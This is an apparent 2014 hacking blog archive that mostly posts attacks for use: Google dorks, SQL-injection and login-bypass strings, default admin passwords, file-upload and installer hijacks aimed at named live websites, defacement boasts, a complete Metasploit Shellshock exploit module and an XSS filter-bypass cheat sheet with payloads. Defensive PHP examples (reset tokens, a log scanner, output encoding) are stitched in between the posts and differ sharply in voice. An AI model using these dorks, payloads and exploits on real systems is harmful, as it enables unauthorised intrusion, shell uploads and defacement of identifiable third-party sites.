Tuesday, September 30, 2014

Is Your eBay Account Safe?

12:57:00 PM Under From Admin


On the twenty-first of May, eBay emailed its one hundred and forty-five million users asking them to change their account passwords, officially confirming that their accounts had been compromised. And that was just the start: hackers found a way to collect user information in bulk, gathering the details of millions of accounts in a few steps.
Furthermore, even after every eBay password has been changed, the hackers still hold the personal details of millions of eBay users, such as their names, addresses, landline numbers, cell phone numbers and dates of birth. According to eBay, however, no financial information was compromised, because all financial details are kept on entirely different servers.

But the interesting question is: how can an eBay account be hacked? When a user clicks the “forgot password” link, as on every other website, they are taken to a separate page that asks for their user details. A random code is then generated and placed in the page as the value of the HTML reqinput field, where it can be seen with the browser's inspect element tool.


Once the user has provided their details, they are taken to a page where they enter their new password twice so that it can be saved. After that, a confirmation email is sent to them.
However, because this step does not use the secret code, the new password is sent (over HTTP) with the same reqinput value that was generated when the user first clicked to reset their password, a value the hacker already knows. The image below shows exactly what the “reqinput” value looks like:

Also, when we come to think of it, even if a person changes their password, as eBay told its customers to, most password reset queries involve information like dates of birth, maiden names, phone numbers and backup emails. So even if eBay says that credit card or PayPal information was not leaked or hacked, how long do you think it would take to go to the reset password link and provide all the information that is already saved in the hacker’s database?
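For contrast with the reset flow described above, here is an added example (not eBay's code and not from the original post) of a reset token that never appears in the page and that personal details cannot replace. The in-memory arrays, the function names and the 15-minute lifetime are assumptions made for the illustration:

```php
<?php
// Added example, not eBay's code. The arrays stand in for database tables;
// function names and the 15-minute lifetime are assumptions.

const RESET_TTL = 900; // seconds

/**
 * Create a reset token for $userId. Only a SHA-256 hash is stored, so a
 * dumped table yields nothing that can be replayed.
 */
function issue_reset_token(array &$store, string $userId, int $now): string
{
    $token = bin2hex(random_bytes(32)); // 256 bits from the CSPRNG
    $store[$userId] = [
        'hash'    => hash('sha256', $token),
        'expires' => $now + RESET_TTL,
    ];
    // The caller mails this to the address on file. It is never echoed into
    // the "forgot password" response, so the page source reveals nothing.
    return $token;
}

/**
 * Set a new password only if the emailed token is presented. Name, birth date
 * or phone number are not accepted as proof; the token is consumed on success.
 */
function reset_password(array &$store, array &$passwords, string $userId,
                        string $token, string $newPassword, int $now): bool
{
    $row = $store[$userId] ?? null;
    if ($row === null) {
        return false;               // no reset was requested
    }
    if ($now > $row['expires']) {
        unset($store[$userId]);     // expired tokens are discarded
        return false;
    }
    if (!hash_equals($row['hash'], hash('sha256', $token))) {
        return false;               // constant-time comparison failed
    }
    unset($store[$userId]);         // single use
    $passwords[$userId] = password_hash($newPassword, PASSWORD_DEFAULT);
    return true;
}

// Constructed walk-through: a guessed value, the real token, then a replay.
$store = $passwords = [];
$now = time();
$token = issue_reset_token($store, 'alice', $now);
var_dump(reset_password($store, $passwords, 'alice', 'value-read-from-page', 'x', $now));
var_dump(reset_password($store, $passwords, 'alice', $token, 'correct horse', $now + 60));
var_dump(reset_password($store, $passwords, 'alice', $token, 'again', $now + 120));
```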

Furthermore, a journalist from the Washington Post and a researcher say that an individual is selling the eBay user database for just 1.453 BTC (Bitcoin; roughly $750+ when converted to United States dollars) for all those forty five million accounts. But eBay has something different to say about that: it says it has checked the list and that the information provided by the individual does not match eBay’s database. Real or fake, information like that can be sold to different people for marketing purposes, which comes with those annoying spam emails, or possibly even to hackers.



Sunday, September 28, 2014

Powered by "Taylored Ideas" Multi Vulnerabilities

10:29:00 AM Under From Admin


Google Dork : "Powered by Taylored Ideas"

The CMS of this website has "SQL Injection" & "Bypass admin Page"

##########[Bypass]##########

Go to : /admin and use '=' 'or' for bypass

##########[SQLi]##########

Go to ?page_id=1[SQL] or ?cmp_id=2[SQL]


Massive defaced by KkK1337 September 27, 2014

12:18:00 AM Under From Admin

[+]=========[Defaced]=========[+]


Saturday, September 27, 2014

Massive defaced by KkK1337 September 27, 2014

11:58:00 PM Under From Admin



[+]=========[Defaced]=========[+]

Apache mod_cgi Bash Environment Variable Code Injection Exploit

7:53:00 PM Under From Admin

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'wvu', # Original Metasploit aux module
        'juan vazquez' # Allow wvu's module to get native sessions
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end

  def check
    res = req("echo #{marker}")

    if res && res.body.include?(marker * 3)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end

    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)

    # A last chance after the cmdstager
    # Trying to make it generic
    unless session_created?
      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
    end
  end

  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")

    req(cmd)
  end

  def req(cmd)
    send_request_cgi(
      {
        'method' => datastore['METHOD'],
        'uri' => normalize_uri(target_uri.path.to_s),
        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
      }, datastore['TIMEOUT'])
  end

  def marker
    @marker ||= rand_text_alphanumeric(rand(42) + 1)
  end
end

Thursday, September 25, 2014

Bash Bug could be a bigger threat than Heartbleed

10:20:00 AM Under From Admin

“Bash Bug Could Be a Nightmare for Linux Users”

The “Bash Bug”, a newly discovered bug in Bash (the Bourne Again Shell), the command-line shell used in most Linux and Unix operating systems, could be a bigger threat than Heartbleed, the Red Hat security team warned.
Bash, or the Bourne Again Shell, is a Unix shell that is widely used to control the command prompt on many Linux computers.
The vulnerability arises from the ability to create environment variables with specially crafted values before calling the Bash shell. If Bash is configured as the default system shell, the vulnerability can be triggered by network-based attackers, who can use it to execute code and commands on servers and devices running Linux and Unix, in the worst cases leaving behind a backdoor for future attacks.
What could the “Bash Bug” do?
A crafted web request targeting a vulnerable CGI application could launch code or commands on the server. Similar attacks are possible via OpenSSH, which could allow even restricted secure shell sessions to bypass controls and execute code on the server. DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server; this would allow arbitrary commands to be run, typically as root, on the DHCP client machine. These are only a few examples; the bug is capable of much more.
Why could the Bash Bug be a bigger threat than Heartbleed?
“Heartbleed”, the bug that resided in production versions of OpenSSL, allowed attackers to extract user IDs and data travelling between servers and end users, while the Bash bug could give an attacker full control over the system.
The “Bash Bug” has been present in enterprise Linux software for years and affects versions 1.14 through 4.3 of GNU Bash. Red Hat and Fedora have already issued a patch for the bug.
Mac OS X is also affected by the bug; a patch is yet to be released by Apple, though it has just issued an update to “command line tools.”
To check whether your Linux or Unix system is vulnerable, type the following at a command line:
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If your system is vulnerable, the output will be:
vulnerable
this is a test
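
A crafted CGI request of the kind described above carries the function-definition prefix in a request header, and that header ends up in the web server's access log. This added example (not part of the original post) flags such entries; the log lines are constructed samples in Apache combined format and the function names are hypothetical:

```php
<?php
// Added example: flag access-log entries whose quoted fields contain the
// start of a Bash function definition. Log lines are constructed samples.

const FUNC_DEF_RE = '/\(\s*\)\s*\{/';   // "() {" with optional whitespace

/** Return the quoted fields (request line, referer, user agent) of one line. */
function quoted_fields(string $line): array
{
    // Apache escapes embedded quotes as \", so allow backslash escapes.
    preg_match_all('/"((?:[^"\\\\]|\\\\.)*)"/', $line, $m);
    return $m[1];
}

/** Scan log lines and report line number, client and the offending field. */
function scan_log(array $lines): array
{
    $hits = [];
    foreach ($lines as $n => $line) {
        foreach (quoted_fields($line) as $field) {
            if (preg_match(FUNC_DEF_RE, $field)) {
                $hits[] = [
                    'line'   => $n + 1,
                    'client' => strtok($line, ' '),
                    'field'  => $field,
                ];
                break; // one report per log line is enough
            }
        }
    }
    return $hits;
}

$sample = [
    '192.0.2.10 - - [25/Sep/2014:10:20:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:21:13 +0000] "GET /cgi-bin/status HTTP/1.1" 200 87 "-" "() { :;}; echo marker"',
    '192.0.2.44 - - [25/Sep/2014:10:22:40 +0000] "GET /app.js HTTP/1.1" 200 900 "-" "curl/7.35.0 (x86_64)"',
];

foreach (scan_log($sample) as $hit) {
    printf("line %d from %s: %s\n", $hit['line'], $hit['client'], $hit['field']);
}
```

A hit shows that a request was attempted, not that it succeeded; whether the host was exposed still depends on the Bash version and on the request reaching a CGI script.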

Sql Injection on CMS AutoWeb v3.0

10:04:00 AM Under From Admin

Google Dork : inurl:"mostrar.php?id_noticia="

Exploit : http://www.[target].com/mostrar.php?id_noticia=[SQLi]

Proof of concept :
http://www.cbnmogi.com.br/mostrar.php?id_noticia=2671+and+0+/*!12345union*/+/*!12345select*/+1,version%28%29,database%28
%29,4,user%28%29,6,7,8,9,10--+ <-- Example how to use exploit

Admin Panel: http://www.[target].com/admin/

Another Target : http://fmg.edu.br/mostrar.php?id_noticia=77'



Friday, September 19, 2014

WordPress wp-store theme remote file upload

1:00:00 AM Under From Admin

Google Dork: inurl:/wp-content/themes/WPstore/

Exploit: /wp-content/themes/WPStore/upload/

Example: http://www.[target].com/wp-content/themes/WPStore/upload/

Live target: http://www.wholisticnutrition.com.au/wp-content/themes/WPStore/upload/

Upload: http://www.wholisticnutrition.com.au/wp-content/uploads/products_img/index.html

You can upload: .html, .pdf, .jpg, .gif

Access to your file: /wp-content/uploads/products_img/




Wednesday, September 17, 2014

Sitefinity File Upload Vulnerability

8:12:00 PM Under From Admin

Google Dork: "/Sitefinity/Login.aspx"

Google Dork: "Sitefinity: Login"


Exploit: /Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx

Example: http://www.[target].com/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx


Live Target: http://www.materprizehome.com.au/Sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx



If you have a problem, write it in a comment and I will answer.

Don't forget to share on your Twitter, Facebook & Google+ accounts.

WordPress - Plugin easy-comment-uploads Remote File Upload

11:32:00 AM Under From Admin


Google Dork : inurl:wp-content/plugins/easy-comment-uploads/upload-form.php

Exploit: wp-content/plugins/easy-comment-uploads/upload-form.php
Example: http://www.[target].com/wp-content/plugins/easy-comment-uploads/upload-form.php
Example: http://www.[target].com/[PATH]/wp-content/plugins/easy-comment-uploads/upload-form.php

Live Target: http://flyguys.net/blog/wp-content/plugins/easy-comment-uploads/upload-form.php

Live Target Upload Dir: http://flyguys.net/blog/wp-content/uploads/2014/09/x.jpg

You can upload: html,txt,gif,jpg,bmp,movie formats. Try with bypassing shell

After upload you can access your file:
Example: http://www.[target].com/wp-content/uploads/[YEAR]/[MONTH]/yourfile.txt
Example: http://www.[target].com/wp-content/uploads/2014/09/x.txt

Don't forget to share on your Twitter, Facebook & Google+ accounts.

If you have a problem, write it in a comment and I will answer.

dotProject Installer Exploit

12:56:00 AM Under From Admin

Google Dork: intitle:"dotProject Installer"

Google Dork: intext:"Welcome to the dotProject Installer!"

Google Dork: inurl:"/dotproject/install/index.php"



This exploit helps with installing a new database and, via the control panel or the database, getting in and uploading your shell. I found 3 dorks that will be very useful.

Don't forget to share this exploit on your Twitter, Facebook & Google+ accounts.

If you have a problem, just write it in a comment.

Tuesday, September 16, 2014

Drupal Reinstall CMS and make admin user

10:08:00 PM Under From Admin

Google Dork : inurl:/install.php intitle:Select an installation profile | Drupal

Notice: when reinstalling this CMS you should create an admin user and password; after the install you need them to log in on the user login panel or the admin panel.

If you have a problem, write it in a comment and I will review and answer.

Don't forget to share this on your Twitter, Facebook & Google+ accounts.


[~] Vulnerability

[~] http://www.[target].com/[PATH]/install.php

[~] http://www.[target].com/install.php



Saturday, September 13, 2014

Powered bySkaLinks Exploit

4:12:00 PM Under From Admin

Google Dork : Powered bySkaLinks - Link Exchange Script.Social software.

Short exploit. If you have any problems, write them in a comment.

login: http://www.[target].com/admin

user : ' or 1=1 or ''='
pass: ' or 1=1 or ''='

Friday, September 12, 2014

Lokomedia Exploit

4:15:00 PM Under From Admin

Google Dork : inurl:"admin/foto_berita/"
Google Dork : inurl:"media.php?module="
Google Dork : inurl:/media.php?module=berita
Google Dork : inurl:/admin/content.php?module=user
Google Dork : inurl:/adminweb/

After dorking you will find some targets

http://www.[target].com/admin/content.php?module=user

add: /admin/content.php?module=user

Need to look like this:

You will start editing info or you can just see info and login to page


User: admin Password: wedus
For administration panel you can use: /adminweb , /admin , /administrator

You are able to upload shell via photo with tamper data.

Default admin login for lokomedia:

admin:admin
wiro:sableng
wiros:sabdi
joko:sembung

sinto:gendeng




Tuesday, September 9, 2014

HTTP Client Response View

11:49:00 AM Under From Admin


HTTP Client is just a tool to view HTTP response.

HTTP Client (928 KB) 
Download: http://www.formosaauditor.com/demo/HttpClient.zip

Monday, September 8, 2014

Web Server And WebDAV Tester

11:29:00 AM Under From Admin


Web Server And WebDAV Tester, Auto PUT test. 
Please Read readme.txt.

Virus Check:
http://r.virscan.org/report/d5aaa728d91ba0e2a1b410b457e988b0

WebTester.zip (1.15 MB) Download:
http://www.mediafire.com/download/1go64v223ovrpxu/WebTester.zip

Sunday, September 7, 2014

How to bypass XSS filters

3:35:00 PM Under From Admin

Cross-site scripting (XSS) is one of the most common and most exploited security vulnerabilities on the web. XSS attacks are critical but often overlooked by administrators.
An XSS vulnerability enables attackers to inject client-side script into a web page viewed by other users. Web developers try to prevent this vulnerability by filtering the text the user types in, to get rid of any script tags or special characters.
In this XSS cheat sheet we will explain some tricks to bypass these protections.

XSS Protections

Several techniques are used to prevent Cross-site scripting.

PHP: str_replace

str_replace — Replace all occurrences of the search string with the replacement string.

This very weak method is often used to strip the script tag.

<?php
    echo 'Your name is ' . str_replace('script', null, $_GET["name"]);
    /*
    page.php?name=Admin
    Output: "Your name is Admin"
    */
?>

The str_replace function is case-sensitive but HTML is not, so you can easily bypass this protection by changing the case of your input.
Filtered:
page.php?name=<script>alert('XSS');</script>
Not filtered:
page.php?name=<ScRiPt>alert('XSS');</ScRiPt>

PHP: htmlentities

htmlentities — Convert all applicable characters to HTML entities.
This protection is pretty efficient against XSS: all characters which have HTML character entity equivalents are translated into these entities.

<?php
    echo "<img alt='Profile' src='".htmlentities($_GET["img"])."' />";
    /*
    page.php?img=photo-1.jpg
    Output: <img alt='Profile' src='photo-1.jpg' />
    */
?>

By default the htmlentities function doesn’t convert single quotes to HTML entities; this is where we can exploit the vulnerability.
page.php?img=.' onerror='alert("XSS")

Bypass XSS filter using data URIs

The data URI scheme is a URI (Uniform Resource Identifier) scheme that provides a way to include data in-line in web pages as if they were external resources.
We will see how data URIs can be used to perform cross-site scripting attacks.

Data URI format

data:[<MIME-type>][;charset=<encoding>][;base64],<data>

Data URI example

<img src="" alt="Wiremask" />

Scope

Data URIs can be used with very few HTML tags; we are limited to exploiting only the following tags:
  • object
  • img
  • a
  • iframe
Using a data URI as an XSS vector, you can sometimes bypass the htmlspecialchars PHP function.


<?php
    echo '<object data="'.htmlspecialchars($_GET['img']).'"></object>';
    /*
    page.php?img=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
    Output: <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4="></object>
    */
?>

We inject our base64-encoded payload <script>alert("XSS")</script> into the object data.
Your code will be executed when the DOM initializes your object element.
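
The three filters above each fail for a different reason: stripping instead of encoding, leaving single quotes unencoded, and accepting any URL scheme. This added example (not from the original post) shows output handling that closes all three; attr(), safe_url() and the render_*() helpers are hypothetical names:

```php
<?php
// Added example, not from the original post. attr(), safe_url() and the
// render_*() helpers are hypothetical names.

/** Encode untrusted text for an HTML element body or a quoted attribute. */
function attr(string $value): string
{
    // ENT_QUOTES encodes ' as well as ". Before PHP 8.1 the default flag was
    // ENT_COMPAT, which leaves single quotes untouched.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Return $url if it is a relative path or an http(s) URL, otherwise null. */
function safe_url(string $url): ?string
{
    $url = trim($url);
    // Reject empty input plus whitespace, control characters and backslashes,
    // which browsers tolerate or rewrite inside URLs.
    if ($url === '' || preg_match('/[\x00-\x20\x7f\\\\]/', $url)) {
        return null;
    }
    // Anything that starts with "scheme:" must be on the allowlist, so a
    // data: URI never reaches src, href or data.
    if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $url, $m)) {
        return in_array(strtolower($m[1]), ['http', 'https'], true) ? $url : null;
    }
    // No scheme: allow relative paths but not protocol-relative "//host/...".
    return strncmp($url, '//', 2) === 0 ? null : $url;
}

function render_name(string $name): string
{
    return 'Your name is ' . attr($name);   // encode, do not strip
}

function render_img(string $src): string
{
    $url = safe_url($src);
    return $url === null ? '' : "<img alt='Profile' src='" . attr($url) . "' />";
}

function render_object(string $data): string
{
    $url = safe_url($data);
    return $url === null ? '' : '<object data="' . attr($url) . '"></object>';
}

// The three inputs discussed in the post, plus one benign value.
$inputs = [
    ['render_name',   "<ScRiPt>alert('XSS');</ScRiPt>"],
    ['render_img',    ".' onerror='alert(\"XSS\")"],
    ['render_img',    'photo-1.jpg'],
    ['render_object', 'data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4='],
];
foreach ($inputs as [$fn, $value]) {
    $html = $fn($value);
    echo $fn, ': ', $html === '' ? '(rejected)' : $html, PHP_EOL;
}
```

Encoding alone does not help in the data URI case because the value contains no character that htmlspecialchars changes, which is why the scheme allowlist runs before the encoder.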